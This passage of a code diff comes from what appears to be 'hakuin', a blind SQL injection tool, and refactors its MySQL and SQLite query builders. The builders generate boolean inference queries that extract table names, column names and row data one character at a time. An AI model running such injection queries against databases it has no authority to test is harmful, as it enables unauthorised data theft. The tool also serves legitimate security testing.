binary_search = self._get_strategy(ctx, searched_space, 'binary', correct)
|
||||
binary_search.run(ctx)
|
||||
n_queries += binary_search.n_queries
|
||||
|
||||
m = self._stats['rpc'][strategy]
|
||||
m['hist'].append(n_queries)
|
||||
m['hist'] = m['hist'][-100:]
|
||||
m['avg'] = sum(m['hist']) / len(m['hist'])
|
||||
|
||||
|
||||
def _update_stats_str(self, ctx, correct_str):
|
||||
'''Like _update_stats but for whole strings'''
|
||||
ctx.s = ''
|
||||
for c in correct_str:
|
||||
self._update_stats(ctx, c)
|
||||
ctx.s += c
|
||||
|
||||
|
||||
def _get_strategy(self, ctx, searched_space, strategy, correct=None):
|
||||
'''Builds search algorithm configured to search appropriate space.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
searched_space (list): list of values that have already been searched
|
||||
strategy (str): strategy ('binary', 'unigram', 'fivegram')
|
||||
correct (str|None): correct character
|
||||
|
||||
Returns:
|
||||
SearchAlgorithm: configured search algorithm
|
||||
'''
|
||||
if strategy == 'binary':
|
||||
charset = list(set(self.charset).difference(searched_space))
|
||||
return BinarySearch(
|
||||
self.requester,
|
||||
self.query_char_cb,
|
||||
values=self.charset,
|
||||
correct=correct,
|
||||
)
|
||||
elif strategy == 'unigram':
|
||||
scores = self.model_unigram.scores(context=[])
|
||||
searched_space.union(set(scores))
|
||||
return TreeSearch(
|
||||
self.requester,
|
||||
self.query_char_cb,
|
||||
tree=make_tree(scores),
|
||||
correct=correct,
|
||||
)
|
||||
else:
|
||||
model_ctx = tokenize(ctx.s, add_eos=False)
|
||||
model_ctx = model_ctx[-(self.model_fivegram.order - 1):]
|
||||
scores = self.model_fivegram.scores(context=model_ctx)
|
||||
|
||||
searched_space.union(set(scores))
|
||||
return TreeSearch(
|
||||
self.requester,
|
||||
self.query_char_cb,
|
||||
tree=make_tree(scores),
|
||||
correct=correct,
|
||||
)
|
||||
return None
|
||||
|
@ -3,54 +3,75 @@ from abc import ABCMeta, abstractmethod
|
||||
|
||||
|
||||
|
||||
class DBMS(metaclass=ABCMeta):
|
||||
RE_NORM = re.compile(r'[ \n]+')
|
||||
|
||||
DATA_TYPES = []
|
||||
|
||||
class Queries(metaclass=ABCMeta):
|
||||
'''Class for constructing SQL queries.'''
|
||||
_RE_NORMALIZE = re.compile(r'[ \n]+')
|
||||
|
||||
|
||||
@staticmethod
|
||||
def normalize(s):
|
||||
return DBMS.RE_NORM.sub(' ', s).strip()
|
||||
return Queries._RE_NORMALIZE.sub(' ', s).strip()
|
||||
|
||||
|
||||
@staticmethod
|
||||
def hex(s):
|
||||
return s.encode("utf-8").hex()
|
||||
|
||||
|
||||
|
||||
class MetaQueries(Queries):
|
||||
'''Interface for queries that infer DB metadata.'''
|
||||
@abstractmethod
|
||||
def count_rows(self, ctx, n):
|
||||
raise NotImplementedError()
|
||||
|
||||
def column_data_type(self, ctx, values): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def count_tables(self, ctx, n):
|
||||
raise NotImplementedError()
|
||||
|
||||
def column_is_nullable(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def count_columns(self, ctx, n):
|
||||
raise NotImplementedError()
|
||||
def column_is_pk(self, ctx): raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def meta_type(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def meta_is_nullable(self, ctx):
|
||||
raise NotImplementedError()
|
||||
|
||||
class UniformQueries(Queries):
|
||||
'''Interface for queries that can be unified.'''
|
||||
@abstractmethod
|
||||
def meta_is_pk(self, ctx):
|
||||
raise NotImplementedError()
|
||||
def rows_count(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def rows_are_ascii(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def row_is_ascii(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def char_is_ascii(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def char(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def char_unicode(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def string(self, ctx, values): raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def char_rows(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def char_tables(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def char_columns(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
class DBMS(metaclass=ABCMeta):
|
||||
'''Database Management System (DBMS) interface.
|
||||
|
||||
@abstractmethod
|
||||
def string_rows(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
Attributes:
|
||||
DATA_TYPES (list): all data types available
|
||||
MetaQueries (MetaQueries): queries of metadata extraction
|
||||
TablesQueries (UniformQueries): queries for table names extraction
|
||||
ColumnsQueries (UniformQueries): queries for column names extraction
|
||||
RowsQueries (UniformQueries): queries for rows extraction
|
||||
'''
|
||||
_RE_ESCAPE = re.compile(r'[a-zA-Z0-9_#@]+')
|
||||
|
||||
DATA_TYPES = []
|
||||
|
||||
MetaQueries = None
|
||||
TablesQueries = None
|
||||
ColumnsQueries = None
|
||||
RowsQueries = None
|
||||
|
||||
|
||||
@staticmethod
|
||||
def escape(s):
|
||||
if DBMS._RE_ESCAPE.match(s):
|
||||
return s
|
||||
assert ']' not in s, f'Cannot escape "{s}"'
|
||||
return f'[{s}]'
|
||||
|
@ -1,9 +1,298 @@
|
||||
from hakuin.utils import EOS
|
||||
from hakuin.utils import EOS, ASCII_MAX
|
||||
|
||||
from .DBMS import DBMS
|
||||
from .DBMS import DBMS, MetaQueries, UniformQueries
|
||||
|
||||
|
||||
|
||||
class MySQLMetaQueries(MetaQueries):
|
||||
def column_data_type(self, ctx, values):
|
||||
values = [f"'{v}'" for v in values]
|
||||
query = f'''
|
||||
SELECT lower(DATA_TYPE) in ({','.join(values)})
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}' AND
|
||||
COLUMN_NAME=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def column_is_nullable(self, ctx):
|
||||
query = f'''
|
||||
SELECT IS_NULLABLE='YES'
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}' AND
|
||||
COLUMN_NAME=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def column_is_pk(self, ctx):
|
||||
query = f'''
|
||||
SELECT COLUMN_KEY='PRI'
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}' AND
|
||||
COLUMN_NAME=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
|
||||
class MySQLTablesQueries(UniformQueries):
|
||||
def rows_count(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT count(*) < {n}
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=database()
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def rows_are_ascii(self, ctx):
|
||||
# min() simulates the logical ALL operator here
|
||||
query = f'''
|
||||
SELECT min(TABLE_NAME = CONVERT(TABLE_NAME using ASCII))
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=database()
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def row_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT TABLE_NAME = CONVERT(TABLE_NAME using ASCII)
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=database()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=database()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('utf-8').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=database()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT char_length(TABLE_NAME) != {len(ctx.s)} AND
|
||||
locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=database()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_unicode(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=database()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string(self, ctx):
|
||||
raise NotImplementedError('TODO?')
|
||||
|
||||
|
||||
|
||||
class MySQLColumnsQueries(UniformQueries):
|
||||
def rows_count(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT count(*) < {n}
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def rows_are_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def row_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('utf-8').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT char_length(COLUMN_NAME) != {len(ctx.s)} AND
|
||||
locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_unicode(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=database() AND
|
||||
TABLE_NAME=x'{self.hex(ctx.table)}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string(self, ctx):
|
||||
raise NotImplementedError('TODO?')
|
||||
|
||||
|
||||
|
||||
class MySQLRowsQueries(UniformQueries):
|
||||
def rows_count(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT count(*) < {n}
|
||||
FROM {MySQL.escape(ctx.table)}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def rows_are_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
|
||||
FROM {MySQL.escape(ctx.table)}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def row_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
|
||||
FROM {MySQL.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
|
||||
FROM {MySQL.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('utf-8').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM {MySQL.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT char_length({MySQL.escape(ctx.column)}) != {len(ctx.s)} AND
|
||||
locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM {MySQL.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_unicode(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {n}
|
||||
FROM {MySQL.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string(self, ctx, values):
|
||||
values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
|
||||
query = f'''
|
||||
SELECT {MySQL.escape(ctx.column)} in ({','.join(values)})
|
||||
FROM {MySQL.escape(ctx.table)}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
|
||||
class MySQL(DBMS):
|
||||
DATA_TYPES = [
|
||||
@ -14,151 +303,15 @@ class MySQL(DBMS):
|
||||
'multilinestring', 'multipolygon', 'geometrycollection ', 'json'
|
||||
]
|
||||
|
||||
MetaQueries = MySQLMetaQueries()
|
||||
TablesQueries = MySQLTablesQueries()
|
||||
ColumnsQueries = MySQLColumnsQueries()
|
||||
RowsQueries = MySQLRowsQueries()
|
||||
|
||||
|
||||
def count_rows(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM {ctx.table}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def count_tables(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=DATABASE()
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def count_columns(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_type(self, ctx, values):
|
||||
values = [f"'{v}'" for v in values]
|
||||
query = f'''
|
||||
SELECT LOWER(DATA_TYPE) in ({','.join(values)})
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}' AND
|
||||
COLUMN_NAME='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_is_nullable(self, ctx):
|
||||
query = f'''
|
||||
SELECT IS_NULLABLE='YES'
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}' AND
|
||||
COLUMN_NAME='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_is_pk(self, ctx):
|
||||
query = f'''
|
||||
SELECT COLUMN_KEY='PRI'
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}' AND
|
||||
COLUMN_NAME='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_rows(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
|
||||
query = f'''
|
||||
SELECT LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
|
||||
LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_tables(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=DATABASE()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1) != '' AND
|
||||
LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=DATABASE()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_columns(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1) != '' AND
|
||||
LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string_rows(self, ctx, values):
|
||||
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
|
||||
query = f'''
|
||||
SELECT {ctx.column} in ({','.join(values)})
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
@staticmethod
|
||||
def escape(s):
|
||||
if DBMS._RE_ESCAPE.match(s):
|
||||
return s
|
||||
assert '`' not in s, f'Cannot escape "{s}"'
|
||||
return f'`{s}`'
|
||||
|
@ -1,145 +1,290 @@
|
||||
from hakuin.utils import EOS
|
||||
|
||||
from .DBMS import DBMS
|
||||
from .DBMS import DBMS, MetaQueries, UniformQueries
|
||||
|
||||
|
||||
|
||||
class SQLite(DBMS):
|
||||
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
|
||||
|
||||
|
||||
|
||||
def count_rows(self, ctx, n):
|
||||
class SQLiteMetaQueries(MetaQueries):
|
||||
def column_data_type(self, ctx, values):
|
||||
values = [f"'{v}'" for v in values]
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM {ctx.table}
|
||||
SELECT type in ({','.join(values)})
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
WHERE name=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def count_tables(self, ctx, n):
|
||||
def column_is_nullable(self, ctx):
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
SELECT [notnull] == 0
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
WHERE name=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def column_is_pk(self, ctx):
|
||||
query = f'''
|
||||
SELECT pk
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
WHERE name=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
|
||||
class SQLiteTablesQueries(UniformQueries):
|
||||
def rows_count(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT count(*) < {n}
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def count_columns(self, ctx, n):
|
||||
def rows_are_ascii(self, ctx):
|
||||
# SQLite does not have native "isascii" function. As a workaround we try to look for
|
||||
# non-ascii characters with "*[^\x01-0x7f]*" glob patterns. The pattern does not need to
|
||||
# include the null terminator (0x00) because SQLite will never pass it to the GLOB expression.
|
||||
# Also, the pattern is hex-encoded because SQLite does not support special characters in
|
||||
# string literals. Lastly, sum() simulates the logical ANY operator here. Note that an empty string
|
||||
# resolves to True, which is correct.
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_type(self, ctx, values):
|
||||
values = [f"'{v}'" for v in values]
|
||||
def row_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT type in ({','.join(values)})
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
WHERE name='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_is_nullable(self, ctx):
|
||||
query = f'''
|
||||
SELECT [notnull] == 0
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
WHERE name='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_is_pk(self, ctx):
|
||||
query = f'''
|
||||
SELECT pk
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
WHERE name='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_rows(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT substr({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
|
||||
instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_tables(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
|
||||
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_columns(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
|
||||
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string_rows(self, ctx, values):
|
||||
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
|
||||
query = f'''
|
||||
SELECT cast({ctx.column} as BLOB) in ({','.join(values)})
|
||||
FROM {ctx.table}
|
||||
SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('utf-8').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT length(name) != {len(ctx.s)} AND
|
||||
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_unicode(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string(self, ctx):
|
||||
raise NotImplementedError('TODO?')
|
||||
|
||||
|
||||
|
||||
class SQLiteColumnsQueries(UniformQueries):
|
||||
